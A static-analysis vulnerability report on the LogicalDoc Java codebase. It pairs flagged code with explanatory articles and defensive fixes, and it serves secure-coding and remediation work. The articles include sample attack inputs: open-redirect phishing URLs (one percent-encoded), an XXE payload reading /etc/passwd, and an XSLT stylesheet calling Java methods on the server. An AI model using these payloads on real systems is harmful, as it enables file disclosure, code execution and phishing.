File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java
Code:

48                successUrl.append("?");
49            successUrl.append("tenant=");
50            successUrl.append(session.getTenantName());
51
52            response.setHeader(PARAM_SUCCESSURL, successUrl.toString());
53            response.sendRedirect(successUrl.toString());
54        }
55    }
56}

Attack details:

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess
33            Authentication authentication) throws IOException, ServletException {
34        String param = request.getParameter(PARAM_SUCCESSURL);
35        LDAuthenticationToken token = (LDAuthenticationToken) authentication;

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess
40        if (param != null) {
41            StringBuffer successUrl = new StringBuffer(param);
42            log.info("Authentication of {} was succesful, redirecting to {}", authentication.getName(), successUrl);

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess
52            response.setHeader(PARAM_SUCCESSURL, successUrl.toString());
53            response.sendRedirect(successUrl.toString());
54        }

Redirecting the user to a malicious site

If the application redirects users to webpages based on input parameters, the malicious user can sometimes control the destination address.

The malicious user can create a special link of the following form: the domain name belongs to the vulnerable application, while the final destination is a malicious site. For example, it can look like this:

Url
http://anybank.com/redirect.html?target=http://evilsite.com/

This allows the malicious user to perform a series of phishing attacks [1], since the user following the redirect will think he is at the original site.

Example 1

This example does not check the url parameter at all, which is a vulnerability that can be used against the users of the resource.

Java
public class RedirectServlet extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
                throws ServletException, IOException {
        String query = request.getQueryString();
        if (query.contains("url")) {
            String url = request.getParameter("url");
            response.sendRedirect(url);
        }
    }
}

Phishing attacks are one way of taking advantage of this vulnerability. Say the user receives an email asking him to follow this link:

Url
http://trusted.example.com/ecommerce/redirect.htm?url=http://evilsite.com/

The user follows the link, thinking it belongs to the trusted site trusted.example.com, while it actually sends him to http://evilsite.com/.

Many users are at least vaguely aware of safe browsing practices and will inspect a link before clicking it. To get past such scrutiny, the link can be obscured with URL parameter encoding:

Url
http://trusted.example.com/ecommerce/redirect.htm?url=%77%69%6C%79%68%61%63%6B%65%72%2E%63%6F%6D


Note that this example is only one of many ways to redirect a user to a chosen resource using the HttpServletResponse class.

Example 2

Java
@RequestMapping(method = RequestMethod.POST)
public String processForm(String url)
{
    return "redirect:" + url;
}

Spring MVC simplifies web service development, but the same convenience can introduce a vulnerability into your service. The redirect instruction is defined as follows: if url is a relative path, the redirect stays within the application; if it is an absolute URL, the user is sent to a different resource. The same result can be achieved with the ModelAndView class: pass the same string to its constructor and the user will be redirected to the new site.

Potential consequences

Since the user assumes that he is still at the original site after the redirect, he may trust the destination site with his login data and other confidential information. As a result, the malicious user can use the stolen data to log in to the original site.

In addition, this vulnerability defeats any CSRF [2] defense that relies on checking the Referer header.

Removal recommendations

•We recommend creating a centralized system that controls the following of any external link, as Facebook does. Any external redirect will trigger a page that notifies the user that he is leaving the current site;

•Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the “accept known good” method for input filtration, such as using a whitelist that describes the acceptable input format. All input that does not follow the format described in the whitelist should be rejected;

•In this context, you should use a list of trusted URLs and domains;

•If the page should absolutely not redirect the user to external resources, set up a check for whether the target URL is local or not. For example, a redirect can be described as the address of the current site plus the parameters passed in the HTTP parameter.
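As an added example (not code from the report or from LogicalDoc), the last two recommendations combined into one check that a Spring handler such as processForm above could call: a plain path is resolved against the application's own origin, an absolute URL is followed only when its host is on an allowlist, and everything else (protocol-relative targets, backslash variants, user-info tricks, non-HTTP schemes) is rejected. The class name, the origin and the allowlist are assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

// Added example: decides whether a client-supplied redirect target may be followed.
public final class RedirectGuard {
    private final String ownOrigin;          // e.g. "https://trusted.example.com" (assumed value)
    private final Set<String> trustedHosts;  // external hosts the site deliberately links to

    public RedirectGuard(String ownOrigin, Set<String> trustedHosts) {
        this.ownOrigin = ownOrigin;
        this.trustedHosts = trustedHosts;
    }

    /**
     * Returns the Spring view name ("redirect:...") for an acceptable target,
     * or null when the target must be rejected and an error page shown instead.
     */
    public String viewFor(String target) {
        if (target == null || target.isEmpty()) {
            return null;
        }
        URI uri;
        try {
            // Some browsers treat "\" like "/", so normalise before parsing.
            uri = new URI(target.replace('\\', '/'));
        } catch (URISyntaxException e) {
            return null;
        }

        // Case 1: a plain path -> local redirect, expressed as own origin + path + query.
        if (uri.getScheme() == null && uri.getRawAuthority() == null) {
            String path = uri.getRawPath();
            if (path == null || !path.startsWith("/")) {
                return null;   // rejects "", "../x" and "other.host/x"
            }
            String query = uri.getRawQuery() == null ? "" : "?" + uri.getRawQuery();
            return "redirect:" + ownOrigin + path + query;
        }

        // Case 2: anything with a scheme or an authority -> only http(s) to a trusted host.
        String scheme = uri.getScheme() == null ? "" : uri.getScheme().toLowerCase(Locale.ROOT);
        if (!scheme.equals("http") && !scheme.equals("https")) {
            return null;   // rejects "//host/x" (no scheme), javascript:, data:, file:
        }
        String host = uri.getHost();
        if (host == null || uri.getRawUserInfo() != null) {
            return null;   // rejects unparsable hosts and "https://trusted@other.host/" forms
        }
        if (!trustedHosts.contains(host.toLowerCase(Locale.ROOT))) {
            return null;
        }
        return "redirect:" + uri;
    }

    public static void main(String[] args) {
        RedirectGuard guard = new RedirectGuard("https://trusted.example.com",
                Set.of("partner.example.org"));
        String[] samples = {                                   // constructed inputs
            "/account/home?tab=1",                             // local: accepted
            "https://partner.example.org/landing",             // allowlisted: accepted
            "http://wilyhacker.com",                           // the decoded parameter above: rejected
            "//wilyhacker.com/x",                              // protocol-relative: rejected
            "/\\wilyhacker.com",                               // backslash variant: rejected
            "https://trusted.example.com@wilyhacker.com/",     // user-info trick: rejected
            "javascript:void(0)",                              // non-HTTP scheme: rejected
        };
        for (String s : samples) {
            String view = guard.viewFor(s);
            System.out.println(s + " -> " + (view == null ? "REJECTED" : view));
        }
    }
}
```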

Java: Incorrect Permissions for External Entities During XML Document Processing
Severity: medium
Language: Java
Short description: If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/XmlXxe.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-cmis/src/main/java/com/logicaldoc/cmis/Converter.java
Code:

2655        }
2656
2657        Document doc = null;
2658
2659        try {
2660            DocumentBuilderFactory dbfac = DocumentBuilderFactory.newInstance();
2661            DocumentBuilder docBuilder = dbfac.newDocumentBuilder();
2662            doc = docBuilder.newDocument();
2663        } catch (Exception e) {
2664            throw new CmisRuntimeException("Unable to convert extensions!", e);
2665        }

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/XMLParser.java
Code:

36    public void internalParse(InputStream input) {
37        try {
38            CharArrayWriter writer = new CharArrayWriter();
39            ExtractorHandler handler = new ExtractorHandler(writer);
40
41            SAXParserFactory factory = SAXParserFactory.newInstance();
42            SAXParser parser = factory.newSAXParser();
43            XMLReader reader = parser.getXMLReader();
44            reader.setContentHandler(handler);
45            reader.setErrorHandler(handler);
46

Incorrect Permissions for External Entities During XML Document Processing

If the application allows the use of external entities [1] in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities.

Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.

Example

In this example, we take a look at a code fragment, where we use the standard Java parser (JAXP) to process the XML file:

Java
InputStream is = request.getInputStream();
// Default factory: external entities in the user's document are resolved.
DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
Document document = builder.parse(is);
NodeList list = document.getElementsByTagName("methodName");
Node methodNode;

for (int i = 0; i < list.getLength(); i++) {
    methodNode = list.item(i);
    String methodName = methodNode.getTextContent();
    switch (methodName) {
        case "getBalance":
        case "getInfo":
        case "changeInfo":
            doingSomething();
            break;
        default:
            // The unrecognised method name is echoed back to the client.
            printErrorMessage("<Error>Method is not supported:" + methodName);
            break;
    }
}

If the user passes the following XML document in his query:

Xml
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/passwd'> ]>
<methodCall>
    <methodName>&e;</methodName>
</methodCall>

Then, after the external entity is resolved in the methodName field (and therefore in the error message), the contents of the /etc/passwd file on the application server will be returned.

Potential consequences

This vulnerability can lead to the following:

•Reading files local to the application server;

•Performing network interactions between the application server and other hosts, including hosts on the local network (see SSRF [2]);

•Denial of Service (DoS) for the application server.

Removal recommendations

We recommend disabling external XML entities when working with user-supplied XML documents. With JAXP, use the following calls:

Java
dbFactory = DocumentBuilderFactory.newInstance();
dbFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

In addition to that, we recommend turning off XML validation (despite the fact that it is off by default):

Java
dbFactory.setValidating(false);

To further protect against DoS attacks, based on processing complex XML documents, as well as against XML Entity Expansion attacks, we recommend turning on the javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING option:

Java
dbFactory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
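As an added example (not code from the report or from LogicalDoc), the three recommendations above applied to both parser entry points the findings show, DocumentBuilderFactory (Converter.java) and SAXParserFactory (XMLParser.java), plus the disallow-doctype-decl feature, which goes one step further and rejects any DTD outright; leave that single feature out if the application must accept documents that carry a DOCTYPE. The class name and the sample document are constructed.

```java
import java.io.ByteArrayInputStream;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

// Added example: XXE-hardened factories for the DOM and SAX paths used by the findings.
public final class HardenedXml {
    // Feature URIs understood by the JDK's built-in Xerces-based parser.
    private static final String DISALLOW_DOCTYPE =
            "http://apache.org/xml/features/disallow-doctype-decl";
    private static final String EXT_GENERAL =
            "http://xml.org/sax/features/external-general-entities";
    private static final String EXT_PARAMETER =
            "http://xml.org/sax/features/external-parameter-entities";
    private static final String LOAD_EXTERNAL_DTD =
            "http://apache.org/xml/features/nonvalidating/load-external-dtd";

    /** DOM path, as in Converter.java. */
    public static DocumentBuilder newDocumentBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(DISALLOW_DOCTYPE, true);      // any <!DOCTYPE> becomes a parse error
        f.setFeature(EXT_GENERAL, false);          // the two calls from the article
        f.setFeature(EXT_PARAMETER, false);
        f.setFeature(LOAD_EXTERNAL_DTD, false);    // no DTD fetched from the network
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true); // entity-expansion limits
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        f.setValidating(false);
        return f.newDocumentBuilder();
    }

    /** SAX path, as in XMLParser.internalParse. */
    public static XMLReader newXmlReader(DefaultHandler handler)
            throws ParserConfigurationException, SAXException {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(DISALLOW_DOCTYPE, true);
        f.setFeature(EXT_GENERAL, false);
        f.setFeature(EXT_PARAMETER, false);
        f.setFeature(LOAD_EXTERNAL_DTD, false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setValidating(false);
        XMLReader reader = f.newSAXParser().getXMLReader();
        reader.setContentHandler(handler);
        reader.setErrorHandler(handler);
        return reader;
    }

    // Constructed sample: the document from the article, with an external entity.
    static final String XXE_SAMPLE =
            "<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/passwd'> ]>"
            + "<methodCall><methodName>&e;</methodName></methodCall>";

    public static void main(String[] args) throws Exception {
        // DOM path: parsing is refused at the DOCTYPE, before any entity is resolved.
        try {
            Document doc = newDocumentBuilder().parse(
                    new ByteArrayInputStream(XXE_SAMPLE.getBytes(StandardCharsets.UTF_8)));
            System.out.println("DOM: parsed (unexpected): " + doc.getDocumentElement().getNodeName());
        } catch (SAXException e) {
            System.out.println("DOM: rejected: " + e.getMessage());
        }
        // SAX path: same outcome with the XMLReader set up the way XMLParser does it.
        try {
            newXmlReader(new DefaultHandler()).parse(new InputSource(new StringReader(XXE_SAMPLE)));
            System.out.println("SAX: parsed (unexpected)");
        } catch (SAXException e) {
            System.out.println("SAX: rejected: " + e.getMessage());
        }
    }
}
```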

Java: Incorrect User Input Filtration when Using the Reflection Mechanism
Severity: medium
Language: Java
Short description: When generating class names for dynamic loading by the Reflection mechanism, the application could use data from external sources without properly filtering them. This gives the malicious user the ability to control the application's control flow and make calls to arbitrary commands.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionReflection.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java
Code:

129        }
130    }
131
132    protected void doConnection() {
133        try {
134            Class.forName(driver);
135            con = DriverManager.getConnection(url, username, password);
136            con.setAutoCommit(true);
137        } catch (Exception ex) {
138            log.error(ex.getMessage(), ex);
139        }

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java

com.logicaldoc.web.service.SetupServiceImpl::createDB
212                    init.setDbms(info.getDbEngine());
213                    init.setDriver(info.getDbDriver());
214                    init.setUrl(adminjdbcUrl);

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::setDriver
180    public void setDriver(String driver) {
181        this.driver = driver;
182    }

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::doConnection
133        try {
134            Class.forName(driver);
135            con = DriverManager.getConnection(url, username, password);

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java
Code:

164     */
165    public boolean testConnection() {
166        boolean result = false;
167
168        try {
169            Class.forName(driver);
170            con = DriverManager.getConnection(url, username, password);
171            result = true;
172            con.close();
173        } catch (Exception ex) {
174            log.error(ex.getMessage(), ex);

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java

com.logicaldoc.web.service.SetupServiceImpl::createDB
212                    init.setDbms(info.getDbEngine());
213                    init.setDriver(info.getDbDriver());
214                    init.setUrl(adminjdbcUrl);

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::setDriver
180    public void setDriver(String driver) {
181        this.driver = driver;
182    }


logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::testConnection
168        try {
169            Class.forName(driver);
170            con = DriverManager.getConnection(url, username, password);

Incorrect User Input Filtration when Using the Reflection Mechanism

When generating class names for dynamic loading by the Reflection mechanism, the application could use data from external sources without properly filtering them. This gives the malicious user the ability to control the application's control flow and make calls to arbitrary commands.

Example

Let's take a look at a command dispatcher implementation:

Java
String ctl = request.getParameter("ctl");
Class cmdClass = Class.forName(ctl + "Command");
Worker ao = (Worker) cmdClass.newInstance();
ao.doAction(request);

Using this form, the user selects the name of the command that needs to be executed. Even if the page has a mechanism in place to limit command names, the malicious user can create any object that supports the Worker interface and execute it.

Moreover, the constructor will be called by default even if the loaded class does not support the interface. For small applications, this is not particularly critical. However, in the case of a large complex application, a class can be found that can severely affect the application's work if its constructor is called.

If the application also has a vulnerability that allows the user to load any files to the server, the malicious user would gain access to the whole system by executing any code.

Potential Consequences

This vulnerability can have the following consequences:

•system hanging;

•data corruption;

•executing malicious code.

Removal Recommendations

•Avoid using user input when generating class names used by the Reflection mechanism;

•Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the "accept known good" method for input filtration, such as using a whitelist that describes the acceptable input format. All input that does not follow the format described in the whitelist should be rejected. For example, if the expected input is an integer, reduce the input to an integer type;

•As an alternative solution, you can use mediated value selection. In other words, the user is given a list of identifiers that are used as a base to generate class names. This way, the user can only select values that are contained in a dictionary prepared ahead of time;

•We recommend against using blacklists to filter class and method names, since it is impossible to predict all user input variations.

Java: Missing Verification of Executable Files' Digital Signature when Executing them from Untrusted Sources
Severity: medium
Language: Java
Short description: If an application uses executable files in its work and does not check their digital signature, then the malicious user could replace the files with their own versions. The malicious code from such a file will then be loaded into the application context and run with the privileges of the application process.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/CommonJarFileVerification.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/io/JarUtil.java
Code:

40            }
41            if (!targetDir.exists()) {
42                FileUtils.forceMkdir(targetDir);
43            }
44
45            JarFile jar = new JarFile(jarsource);
46            JarEntry jare;
47
48            for (Enumeration enum1 = jar.entries(); enum1.hasMoreElements(); saveEntry(jar, jare, target)) {
49                jare = (JarEntry) enum1.nextElement();
50            }

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/io/JarUtil.java
Code:

75            }
76            if (!targetDir.exists()) {
77                FileUtils.forceMkdir(targetDir);
78            }
79
80            JarFile jar = new JarFile(jarsource);
81            JarEntry jare = new JarEntry(entry);
82            saveEntry(jar, jare, target);
83        } catch (Exception e) {
84            result = false;
85            log.error(e.getMessage(), e);

Missing Verification of Executable Files' Digital Signature when Executing them from Untrusted Sources


If an application uses executable files in its work and does not check their digital signature, then the malicious user could replace the files with their own versions. The malicious code from such a file will then be loaded into the application context and run with the privileges of the application process.

Example

Let's take a look at an example of a service with extendable functionality. Suppose the service compiles data from various sources. When a new data source is added, the service must be extended in such a way that it could read the new message format. In order to do this, the following function for loading the modules on the fly is present:

Java
File f = new File(downloadedFilePath);
JarFile jf = new JarFile(f);

The loaded file is received from an external source, and does not get verified for integrity or for its digital signature. The malicious user could then execute a "man in the middle" attack [1], and replace the loaded file with one of their own. The malicious code will then be run in the context of the service with all of its privileges. For example, such code could intercept incoming messages and change them, or forward them to a malicious user's account.

Potential Consequences

•Launching malicious executable code with application privileges and intercepting control of the system;

•Compromising confidential information.

Removal Recommendations

Before launching executable code received from untrusted sources, we recommend checking its integrity and verifying its digital signature. We recommend against accepting unsigned executable files from external sources.

With these recommendations, we can rewrite the example as such:

Java
File f = new File(downloadedFilePath);
JarFile jf = new JarFile(f, true);

If the file is unsigned, or the signature is compromised, the system throws a SecurityException.
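As an added example (not code from the report or from LogicalDoc), a check that goes one step beyond the verify flag: with verify=true, JarFile only checks entries that actually carry a signature, and it does so while the entry's bytes are read, so the code below reads every entry, requires a signer on each one, and compares the signer's leaf certificate with a certificate pinned by the deployment. The class name, the pinned certificate and openTrusted() are assumptions; a tampered entry still surfaces as the SecurityException the text describes.

```java
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.security.CodeSigner;
import java.security.cert.Certificate;
import java.security.cert.X509Certificate;
import java.util.Enumeration;
import java.util.List;
import java.util.Locale;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

// Added example: accept a downloaded jar only if every entry is signed by a pinned certificate.
public final class SignedJarCheck {

    private SignedJarCheck() {}

    /**
     * Returns true only when every content entry carries a valid signature whose leaf
     * certificate equals the pinned one. A tampered entry makes JarFile throw
     * SecurityException while it is read; an unsigned entry returns false here,
     * because verify=true on its own lets unsigned content through.
     */
    public static boolean isSignedBy(File jarPath, X509Certificate pinned) throws IOException {
        try (JarFile jar = new JarFile(jarPath, true)) {   // verify = true, as in the article
            byte[] buf = new byte[8192];
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                JarEntry entry = entries.nextElement();
                if (entry.isDirectory() || isSignatureMetadata(entry.getName())) {
                    continue;
                }
                // Digests are checked as the bytes are read, and getCodeSigners()
                // is only populated once the entry has been read to the end.
                try (InputStream in = jar.getInputStream(entry)) {
                    while (in.read(buf) != -1) {
                        // drain
                    }
                }
                CodeSigner[] signers = entry.getCodeSigners();
                if (signers == null || !leafMatches(signers, pinned)) {
                    return false;
                }
            }
        }
        return true;
    }

    // Compare only the leaf certificate: the rest of the chain is not validated here.
    private static boolean leafMatches(CodeSigner[] signers, X509Certificate pinned) {
        for (CodeSigner signer : signers) {
            List<? extends Certificate> chain = signer.getSignerCertPath().getCertificates();
            if (!chain.isEmpty() && chain.get(0).equals(pinned)) {
                return true;
            }
        }
        return false;
    }

    // The manifest and the signature files themselves are not signed content.
    private static boolean isSignatureMetadata(String name) {
        String n = name.toUpperCase(Locale.ROOT);
        if (!n.startsWith("META-INF/")) {
            return false;
        }
        return n.equals("META-INF/MANIFEST.MF") || n.endsWith(".SF")
                || n.endsWith(".RSA") || n.endsWith(".DSA") || n.endsWith(".EC");
    }

    // Usage with the article's variable names. The pinned certificate is deployment
    // configuration (for example loaded with CertificateFactory from a file shipped
    // with the service); it is never taken from the downloaded jar itself.
    public static JarFile openTrusted(String downloadedFilePath, X509Certificate pinned)
            throws IOException {
        File f = new File(downloadedFilePath);
        if (!isSignedBy(f, pinned)) {
            throw new SecurityException("rejected unsigned or untrusted jar: " + f);
        }
        return new JarFile(f, true);
    }
}
```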

Java: Using XSL Transformation to Execute Any Code
Severity: medium
Language: Java
Short description: The JAXP parser for XSL transformations (XSLT) uses the XALAN processor, which allows you to add instructions to the XSL file that create objects and call Java instance and static methods [1]. This means that the malicious user can add a wide variety of calls to critical methods that would be executed on the server with the processor's privileges. Therefore, if, when transforming an XML file, you use an XSL file from an untrusted source, the malicious user can inject instructions that will be executed on the attacked server.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/XsltCodeExecution.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/HTMLParser.java
Code:

77    }
78
79    @Override
80    public void internalParse(InputStream input) {
81        try {
82            TransformerFactory factory = TransformerFactory.newInstance();
83            Transformer transformer = factory.newTransformer();
84
85            XMLParserConfiguration parserConfig = new HTMLConfiguration();
86
87            ElementRemover remover = new ElementRemover();

Using XSL Transformation to Execute Any Code

The JAXP parser for XSL transformations (XSLT) uses the XALAN processor, which allows you to add instructions to the XSL file that create objects and call Java instance and static methods [1]. This means that the malicious user can add a wide variety of calls to critical methods that would be executed on the server with the processor's privileges.

Therefore, if, when transforming an XML file, you use an XSL file from an untrusted source, the malicious user can inject instructions that will be executed on the attacked server.

Example 1

In 2011, the Liferay open-source corporate portal system had a vulnerability in its XSL Portlet component [1]. This component, designed for processing and displaying XML feeds from external services, worked as follows: the user added the address of the XML feed and the XSL schema to the page, which let him filter the feed as needed.

To perform the attack, the malicious user had to do the following:

•Log in to the portal with his account;

•Create a new page, if necessary;

•Create the XSL Portlet on his page, and set it up in a way that it would use the XSL file containing calls to the necessary commands;

•Send a request to the page to activate the XSL processor. As a result, the commands written in the infected XSL file were run in the context of the user account under which the portal server was running.

Example 2

In this example, we are looking at a function that performs the XSLT. This function receives the XML file dataXML, the transformation schema inputXSL, and writes the result in the outputHTML file. We use the standard XML parser JAXP to perform the transformation.

Java
public void transform(String dataXML, String inputXSL, String outputHTML)
        throws TransformerConfigurationException, TransformerException {
    TransformerFactory factory = TransformerFactory.newInstance();
    StreamSource xslStream = new StreamSource(inputXSL);
    Transformer transformer = factory.newTransformer(xslStream);
    StreamSource in = new StreamSource(dataXML);
    StreamResult out = new StreamResult(outputHTML);
    transformer.transform(in, out);
}

If the inputXSL file is received from an untrusted source, and the malicious user has added the following fragment to it:

Xml
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:jv="http://xml.apache.org/xalan/java"
                exclude-result-prefixes="jv" version="1.0">
    <xsl:template match="/">
        <root>
            <xsl:variable name="osversion"
                          select="jv:java.lang.System.getProperty('os.name')"/>
            <xsl:value-of select="$osversion" />
        </root>
    </xsl:template>
</xsl:stylesheet>

Then, no matter what the dataXML file contains, the outputHTML file will contain the following:

Xml
<?xml version="1.0" encoding="UTF-8"?><root>Windows Server 2008</root>

If this file is published, the malicious user will have access to critical information, or, if he adds other function calls in the XSL file, will be able to access some server application commands.

Potential consequences

This vulnerability can lead to the following consequences:

•Running any code on the server side with strong privileges;

•Giving the malicious user access to critical information.

Removal recommendations

When performing an XSL transformation on an XML file, we strongly recommend against using XSL schemas received from outside sources.

In the case that using external XSL schema is necessary, we recommend using the secure XML processing option. You can do it in two ways:

Java
factory.setFeature("http://javax.xml.XMLConstants/feature/secure-processing", true);

or

Java
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

After using this option, upon finding Java code calls, the parser will throw an exception.
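As an added example (not code from the report or from LogicalDoc), the transform function from Example 2 rebuilt on a factory with secure processing enabled and external access switched off explicitly; fed the jv: stylesheet from the article it fails with a TransformerException instead of calling into java.lang.System, while a stylesheet without extension calls still transforms. Class and method names are assumptions; ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_STYLESHEET exist from Java 7u40 (JAXP 1.5) onwards.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

// Added example: XSLT with Java extension functions and external access disabled.
public final class SafeXslt {

    public static TransformerFactory newFactory() throws TransformerConfigurationException {
        TransformerFactory factory = TransformerFactory.newInstance();
        // Secure processing: extension functions such as the jv: namespace are refused.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Set explicitly rather than relying on JDK defaults: no external DTDs, and no
        // xsl:import / xsl:include / document() fetches of other stylesheets.
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return factory;
    }

    /** Same shape as the article's transform(), but working on strings. */
    public static String transform(String dataXML, String inputXSL) throws TransformerException {
        Transformer transformer =
                newFactory().newTransformer(new StreamSource(new StringReader(inputXSL)));
        StringWriter out = new StringWriter();
        transformer.transform(new StreamSource(new StringReader(dataXML)), new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) {
        String data = "<data/>";   // constructed; irrelevant to the outcome, as the article notes
        // Constructed: a stylesheet without extension calls, and the article's jv: stylesheet.
        String plainXsl = "<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
                + " version=\"1.0\"><xsl:template match=\"/\"><root>ok</root>"
                + "</xsl:template></xsl:stylesheet>";
        String extensionXsl = "<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
                + " xmlns:jv=\"http://xml.apache.org/xalan/java\" version=\"1.0\">"
                + "<xsl:template match=\"/\"><root>"
                + "<xsl:value-of select=\"jv:java.lang.System.getProperty('os.name')\"/>"
                + "</root></xsl:template></xsl:stylesheet>";
        for (String xsl : new String[] {plainXsl, extensionXsl}) {
            try {
                System.out.println("result: " + transform(data, xsl));
            } catch (TransformerException e) {
                // The extension stylesheet ends up here, at compile time of the stylesheet.
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```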

Java: Direct management of database connections in j2ee applications
Severity: low
Language: Java
Short description: The J2EE standard forbids directly connecting to the database. In order to establish a connection, the application must use centralized resource management systems, which are built into the application container.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/J2eeRestrictionDatabaseConnection.html


Found Vulnerabilities:
File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java
Code:

165    public boolean testConnection() {
166        boolean result = false;
167
168        try {
169            Class.forName(driver);
170            con = DriverManager.getConnection(url, username, password);
171            result = true;
172            con.close();
173        } catch (Exception ex) {
174            log.error(ex.getMessage(), ex);
175        }

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java
Code:

130    }
131
132    protected void doConnection() {
133        try {
134            Class.forName(driver);
135            con = DriverManager.getConnection(url, username, password);
136            con.setAutoCommit(true);
137        } catch (Exception ex) {
138            log.error(ex.getMessage(), ex);
139        }
140    }

Direct management of database connections in j2ee applications

The J2EE standard forbids directly connecting to the database. In order to establish a connection, the application must use centralized resource management systems, which are built into the application container.

Example

Let’s take a look at an example where we use DriverManager to connect to the database:

Java
public class DatabaseConnection {
    private static final String CONNECT_STRING = "jdbc:mysql://localhost:3306/mysqldb";

    private Connection conn = null;

    public void openDatabaseConnection() {
        try {
            // Bypasses the container's connection pool.
            conn = DriverManager.getConnection(CONNECT_STRING);
        } catch (SQLException ex) {...}
    }

    public Connection getConnection() {
        return conn;
    }
}

This approach has several drawbacks. Every application container has its own resource management mechanisms, including one that provides a prepared pool of connections to the database. Using DriverManager to create new connections duplicates the centralized mechanism, which is poor practice. In addition, creating a fully realized resource dispatcher is a difficult task, which can lead to development errors and takes extra time. This is one of the reasons that this practice is forbidden by the standard.

Potential consequences

This method can lead to irrational use of application resources.

Removal recommendations

The standard recommends using built-in application container resource management methods. Particularly, the above example should be rewritten as such:

Java
public class DatabaseConnection {

    // JNDI name under which the container exposes its managed DataSource
    // (the exact name is container configuration).
    private static final String DB_DATASRC_REF = "java:comp/env/jdbc/mysqldb";
    private Connection conn = null;

    public DatabaseConnection() {
    }

